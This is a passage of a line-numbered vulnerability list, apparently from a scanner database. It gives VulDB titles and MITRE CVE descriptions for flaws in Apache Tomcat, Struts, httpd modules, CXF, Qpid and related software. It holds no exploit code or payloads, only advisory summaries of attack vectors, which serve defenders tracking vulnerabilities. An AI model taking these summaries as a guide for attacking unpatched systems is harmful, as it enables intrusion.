6059| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
6060| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
6061| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
6062| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
6063| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
6064| [36225] XAMPP Apache Distribution 1.6.0a sql injection
6065| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
6066| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
6067| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
6068| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
6069| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
6070| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
6071| [34252] Apache HTTP Server denial of service
6072| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
6073| [33877] Apache Opentaps 0.9.3 cross site scripting
6074| [33876] Apache Open For Business Project unknown vulnerability
6075| [33875] Apache Open For Business Project cross site scripting
6076| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
6077| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
6078|
6079| MITRE CVE - https://cve.mitre.org:
6080| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
6081| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
6082| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
6083| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
6084| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
6085| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
6086| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
6087| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
6088| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
6089| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
6090| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
6091| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
6092| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
6093| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
6094| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
6095| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
6096| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
6097| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
6098| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
6099| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
6100| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
6101| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
6102| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
6103| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
6104| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
6105| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
6106| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
6107| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
6108| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
6109| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
6110| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
6111| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
6112| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
6113| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
6114| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
6115| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
6116| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
6117| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
6118| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
6119| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
6120| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
6121| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
6122| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
6123| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
6124| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
6125| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
6126| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
6127| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
6128| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
6129| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
6130| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
6131| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
6132| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
6133| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
6134| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
6135| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
6136| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
6137| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
6138| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
6139| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
6140| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
6141| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
6142| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
6143| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
6144| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
6145| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
6146| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
6147| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
6148| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
6149| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
6150| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
6151| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
6152| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
6153| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
6154| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
6155| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
6156| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
6157| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
6158| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
6159| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
6160| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
6161| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
6162| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
6163| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
6164| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
6165| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
6166| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
6167| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
6168| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
6169| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
6170| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
6171| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
6172| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
6173| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
6174| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
6175| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
6176| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
6177| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
6178| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
6179| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
6180| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
6181| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
6182| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
6183| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
6184| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
6185| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
6186| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
6187| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
6188| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
6189| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
6190| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
6191| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
6192| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
6193| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
6194| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
6195| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
6196| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
6197| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
6198| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
